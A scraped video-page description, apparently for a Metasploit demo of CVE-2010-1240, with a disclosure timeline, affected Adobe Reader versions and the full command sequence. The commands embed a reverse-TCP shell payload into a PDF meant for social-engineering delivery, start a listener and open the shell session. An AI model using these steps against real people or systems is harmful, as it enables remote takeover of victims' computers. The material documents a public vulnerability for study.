Alert icon
We're changing our privacy policy. This stuff matters.  Learn more  Dismiss

CVE-2010-1240 : Adobe PDF Embedded EXE Social Engineering

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
2,083
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Feb 5, 2011

Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang

Timeline :
Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31

PoC provided by:
jduck
Colin Ames

Reference(s) :
CVE-2010-1240
EDB-ID-11987

Affected versions :
Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh

Tested on Windows XP SP3 with Adobe Reader 9.3.0

Description :
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

Metasploit demo :

use exploit/windows/fileformat/adobe_pdf_embedded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j

sessions -i 1
dir

  • likes, 0 dislikes

Link to this comment:

Share to:
see all

All Comments (0)

Sign In or Sign Up now to post a comment!
Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more